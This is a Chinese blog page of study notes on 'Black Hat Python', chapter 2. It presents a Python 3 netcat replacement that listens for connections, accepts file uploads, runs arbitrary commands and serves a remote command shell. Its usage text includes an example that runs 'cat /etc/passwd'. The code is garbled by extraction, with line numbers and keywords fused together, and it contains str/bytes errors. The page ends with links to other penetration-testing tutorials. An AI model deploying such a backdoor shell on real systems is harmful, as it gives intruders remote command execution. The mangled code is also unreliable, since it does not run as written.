python网络渗透入门_python3黑帽子渗透笔记第二章--网络基础

最新推荐文章于 2023-12-14 11:50:36 发布
最新推荐文章于 2023-12-14 11:50:36 发布
阅读量136 收藏
点赞数
文章标签: python网络渗透入门

1 #!/usr/bin/env python3

2 #coding=utf-8

3 importsys4 from socket import *

5 import getopt #用来处理命令行参数

6 importthreading7 import subprocess #启动一个shell,并控制输入输出

8

9 #-e和-p有问题,mac下运行没什么问题,win下有问题,运行的命令会出现问题。

10 listen =False11 command =False12 upload =False13 execute = ""

14 target = ""

15 upload_destination = ""

16 port =017

18 #帮助提示

19 defusage():20 print("netcat")21 print("Usage:nc_hacker.py -t target_host -p target_port")22 print("-l --listen - listen on [host]:[port] for incoming connections")23 print("-e --execute=ile_to_run - execute the given file upon receiving a connection")24 print("-c --command - initialize a command shell")25 print("-u --upload=destination - upon receiving connection upload a file and write to [destination]")26 print("Examples:")27 print("nc_hacker.py -t 192.168.0.1 -p 5555 -l -c")28 print("nc_hacker.py -t 192.168.0.1 -p 5555 -l -u c:\\target.exe")29 print("nc_hacker.py -t 192.168.0.1 -p 5555 -l -e \"cat /etc/passwd\"")30 print("echo 'ABCDEFGHI' | ./nc_hacker.py -t 192.168.11.12 -p 135")31 sys.exit(0)32

33

34 #主函数

35 defmain():36 globallisten37 globalport38 globalexecute39 globalcommand40 globalupload_destination41 globaltarget42 #没有输入值就显示菜单

43 if not len(sys.argv[1:]):44 usage()45 try:46 #getopt模块处理命令行,

47 #h后面没有冒号:表示后面不带参数,p:和i:后面有冒号表示后面需要参数

48 #help后面没有等号=,表示后面不带参数,有=,表示后面需要参数

49 #返回值options是个包含元祖的列表,每个元祖是分析出来的格式信息,比如[('-i','127.0.0.1'),('-p','80')]

50 #args 是个列表,包含那些没有‘-’或‘--’的参数,比如:['55','66']

51 opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:",52 ["help", "listen", "execute", "target", "port", "command", "upload"])53 exceptgetopt.GetoptError as err:54 print(str(err))55 usage()56 for o, a inopts:57 if o in ("-h", "--help"):58 usage()59 elif o in ("-l", "--listen"):60 listen =True61 elif o in ("-e", "--execute"):62 execute =a63 elif o in ("-c", "--command"):64 command =True65 elif o in ("-u", "--upload"):66 upload_destination =a67 elif o in ("-t", "--target"):68 target =a69 elif o in ("-p", "--port"):70 port =int(a)71 else:72 print("unhandled option")73 #从标准输入中发送数据

74 if not listen and len(target) and port >0:75 #读取输入的数据

76 #这里将阻塞,发送ctrl-d使用

77 buffer = input() #sys.stdin.read()

78 #发送数据

79 client_sender(buffer)80 #进行监听

81 iflisten:82 print('the server is listening on %s:%d' %(target, port))83 server_loop()84

85

86 #客户端代码

87 defclient_sender(buffer):88 client =socket(AF_INET, SOCK_STREAM)89 try:90 print("start connecting...")91 client.connect((target, port))92 print("connected")93 #如果我们检测到来自stdin的输入。

94 #如果不是,我们就等待用户输入。

95 iflen(buffer):96 client.send(buffer)97 whileTrue:98 #等待数据回传

99 recv_len = 1

100 response = ""

101 print("waiting response:")102 whilerecv_len:103 data = client.recv(4096)104 recv_len =len(data)105 response += data.decode("utf-8")106 if recv_len < 4096:107 break

108 print(response, end="")109 #等待更多输入

110 buffer = input("")111 buffer += "\n"

112 client.send(buffer.encode("utf-8"))113 except:114 print("[*] Exception! Exiting.")115 #断开连接

116 client.close()117

118

119 #服务端代码

120 defserver_loop():121 globaltarget, port122

123 #如果没有定义目标,就监听所有接口

124 if notlen(target):125 target = "0.0.0.0"

126 server =socket(AF_INET, SOCK_STREAM)127 server.bind((target, port))128 server.listen(5)129

130 whileTrue:131 client_socket, addr =server.accept()132 #print(client_socket)

133 #分出一个线程来处理新的客户端

134 client_thread = threading.Thread(target=client_handler, args=(client_socket,))135 client_thread.start()136

137

138 #-c命令

139 defrun_command(command):140 #返回从字符串末尾删除所有字符串的字符串(默认空白字符)的副本

141 command =command.rstrip()142 #运行命令并将输出返回

143 try:144 #subprocess.STDOUT是抛出异常。

145 output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)146 except:147 output = "Failed to execute command.\r\n"

148 #将输出发送

149 returnoutput150

151

152 #处理传入的客户端连接

153 defclient_handler(client_socket):154 globalupload, execute,155 #检测上传文件command

156 iflen(upload_destination):157 #读取所有的字节并写入

158 file_buffer = ""

159 #持续读取数据直到没有数据可用为止,有问题

160 whileTrue:161 data = client_socket.recv(1024)162 if notdata:163 break

164 else:165 file_buffer +=data166 #现在我们取这些字节并试着把它们写出来。

167 try:168 print('opening')169 #打开文件并写入

170 file_descriptor = open(upload_destination, "wb")171 file_descriptor.write(file_buffer)172 print('written')173 file_descriptor.close()174

175 #确认文件是否上传

176 client_socket.send("Successfully saved file to %s\r\n" %upload_destination)177 except:178 client_socket.send("Failed to save file to %s\r\n" %upload_destination)179 #检查命令执行

180 iflen(execute):181 #运行命令

182 output =run_command(execute)183 client_socket.send(output)184 #如果需要一个命令shell,那我们进入另一个循环,。

185 ifcommand:186 whileTrue:187 #跳出一个窗口

188 client_socket.send(b"")189 #现在我们接收文件直到发现换行符(enter key)

190 cmd_buffer = ""

191 while "\n" not incmd_buffer:192 cmd_buffer += client_socket.recv(1024).decode("utf-8")193 #返还命令输出

194 response =run_command(cmd_buffer)195 #返回相应数据

196 client_socket.send(response)197

198

199 if __name__ == "__main__":200 main()

weixin_39999536
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python帽编程指南:网络攻防与渗透测试Python游戏开发实践
吃不胖.
10-17 92
本书“Python帽编程指南:网络攻防与渗透测试”是一本介绍Python网络攻防方面的应用和实践的书籍,篇幅较短,但内容非常实用。本书“Python游戏开发实践”就是一本介绍Python在游戏开发中的应用和实践的书籍。Pygame是Python中一个非常流行的游戏开发库,本书介绍了Pygame的基本概念和使用方法,以及如何使用Pygame创建2D游戏。本书还给出了一些游戏开发的具体实例,例如飞机大战、2048小游戏等,通过这些实例可以更好地了解Python在游戏开发中的应用。Python游戏开发实践。
python安全开发/高级渗透技术
04-15
课程内容包括python语言应用、介绍、开发实例、python gui编程、网络编程、数据库编程、爬虫编程、python开发扫描器、爆炸工具、漏洞利用等,通过本教材的学习,我们可以深入了解最先进的python语言。在语言开发、爬虫工具开发、客工具开发等方面。它正在学习python以及网络和信息。安全人员至关重要。
Python安全攻防:渗透测试实战指南》极致经典,学完即可包吃包住
bdfcfff77fa的博客
05-26 977
网络江湖,风起云涌,攻防博弈,从未间断,且愈演愈烈。从架构安全到被动纵深防御,再到主动防御、安全智能,直至进攻反制,皆直指安全的本质——攻防。未知攻,焉知防!每一位网络安全从业者都有仗剑江湖的侠客情怀和维护网络公平正义的初心。渗透测试就是一把“利剑”,出其不意、攻其不备,模拟客之攻击,为安全防御系统诊脉,补全不足,修炼内功,提升防御能力。用别人之剑,还是自己铸剑?哪个更得心应手?哪个威力更强大?答案显而易见。《Python安全攻防:渗透测试实战指南》
python渗透测试---第一章:基础
weixin_45761101的博客
05-21 568
1、
python网络渗透之:扫描探测篇
最新发布
hih30250的博客
12-14 547
1.Scapy的简介关于Scapy,Scapy是一个python程序,它允许用户发送、嗅探、解析和伪造网络数据包。此程序允许构建可以探测、扫描、或攻击网络的工具。换句话说,Scapy是一个强大的交互式数据包操作程序。它能够伪造或解码多种协议的数据包,在网上发送数据包,捕获数据包,匹配请求和回复,等等。Scapy可以轻松处理大多数经典任务,如:扫描、跟踪路由、探测、单元测试、攻击或网络发现。
python 网络编程学习: 1 初识 SOCKET
aipuchai0633的博客
08-05 123
套接字首先,我们应先理解什么事套接字。套接字是一种具有之前所说的“通信端点”概念的计算机网络数据结构。网络化的应用程序在开始任何通讯之前都必须要创建套接字。就像电话的插口一样,没有它就没办法通信。套接字有两种,分别是基于文件型的和基于网络型的。套接字家族包括AF_UNIX,AF_LOCAL,AF_INET和AF_NETLINK。python只支持AF_UNIX,AF_INET和AF_NE...
python渗透测试编程技术-方法与实践.azw3_python渗透测试_
09-30
Python渗透测试编程技术是网络安全领域中的一个重要分支,它利用Python语言的强大功能来发现并利用系统漏洞,以评估网络和应用程序的安全性。Python因其简洁、高效和丰富的库支持而成为渗透测试人员的首选语言。本篇...
OpenCV轻松入门_python-opencvpdf_opencv
09-10
OpenCV轻松入门,面向Python
Python入门教程-超详细1小时学会Python.rar_Python 入门_Python入门_python_python
09-24
这个“Python入门教程-超详细1小时学会Python”可能涵盖了以上所述的基础知识,通过阅读和实践文档中的例子,你将能够快速上手Python编程。同时,不断练习和解决实际问题,将有助于你巩固知识,成为一名熟练的Python...
web-spider-data-analysis.rar_Python爬虫入门_data analysis_data analy
09-14
标签“python爬虫入门”,“data_analysis”,“data_analysis_python”,“python网络爬虫”确认了这个资料集是针对初学者,旨在教授如何使用Python进行网络爬虫的编写以及后续的数据分析工作。 在Python中,网络...
python入门ppt.zip_Python入门_Python基础 ppt_python 入门_python 教材 ppt_py
07-15
本教程是一套针对Python初学者精心设计的入门级课程,旨在帮助用户快速掌握Python基础语言。通过这套PPT教程,学习者可以了解到Python编程的核心概念和基本语法,为后续深入学习和实践打下坚实的基础。 **Python...
chatgpt赋能pythonPython可以入侵别人电脑吗?
tutan123321的博客
06-04 801
本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。🧡AI职场汇报智能办公文案写作效率提升教程 🧡专注于AI+职场+办公方向。下图是课程的整体大纲下图是AI职场汇报智能办公文案写作效率提升教程中用到的ai工具。
python实现渗透工具(多线程篇)
weixin_45794666的博客
01-03 1085
网络安全防护_多线程 多线程 什么是线程 线程(Thread)被包涵在进程之中,是进程中的实际运作单位。一个线程可以创建和撤消另一个线程,同一进程中的多个线程之间可以并发执行。 为什么要使用多线程 使用多线程来实现多任务并发执行比使用多进程的效率高。 python多线程实现 简单使用 import threading import time def run(n): print("task", n) time.sleep(1) print('2s')
使用Python编写渗透测试工具——学习笔记
渗透测试
06-25 2361
目录0x01.Socket模块0x02.python-nmap模块0x03.Scapy模块a.基本操作b.发送接收函数c.sniff()函数d.简单的任务实现 0x01.Socket模块 安装socket模块 pip install socketssh 重要的函数(socket.py) import socket # -------------------------------------------------------- # s = socket.socket() #初始化tcp类型的
python渗透攻击
weixin_50699777的博客
04-01 5802
文章目录前言一、拒绝服务攻击1.含义2.数据链路层的拒绝服务攻击3.网络层的拒绝服务攻击4.传输层的拒绝服务攻击5.应用层的拒绝服务攻击二、身份认证攻击1.简单网络服务攻击的认证2.破解密码字典3.FTP暴力破解模块三、网络嗅探与欺骗1.网络数据嗅探2.ARP的原理与缺陷 前言 这是Python渗透测试编程技术,基于python模块是实现的 一、拒绝服务攻击 1.含义 拒绝服务攻击即是攻击者想办法让目标机器停止提供服务,是客常用的攻击手段之一。 拒绝服务攻击并不是一个攻击方式,而是一类具有相似特征的攻击
python 网络渗透_python 网络编程(渗透与编程一)
weixin_39755824的博客
11-20 371
0x00网络一直是客们最喜欢的竞技场。通过简单的网络访问,攻击者可以做任何想做的事情。例如主机扫描,数据包注入,远程攻击等。但是当我们通过某种方法进入某企业内网,假设在次内网中无任何工具可以利用,但是你惊讶的发现目标环境中安装了Python环境,那么我们可以利用这个环境,将编写你所可能要用到的工具,实现我们的渗透。我们的目标不是成为网络编程高手,我们只需要迅速,简单,可靠的处理日常的任务工具。0...
python渗透编程之道
OldBowl
05-08 2288
1、学python 2、网络知识 3、渗透知识
Python帽子--客与渗透测试编程之道 python3 实现代码
热门推荐
qq_39038028的博客
06-04 1万+
最近在看 Python帽子客与渗透测试编程之道 这本书 发现这本书的代码实现都是使用python2 的于是我就想使用python3来实现 缓慢更新中 python2版本 有一个博主写的特别好 这是链接 http://blog.csdn.net/u012763794/article/details/50612756 部分注释我使用的这位博主的 而且这位博主的注释写的比我好 我的注释写的很少T

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值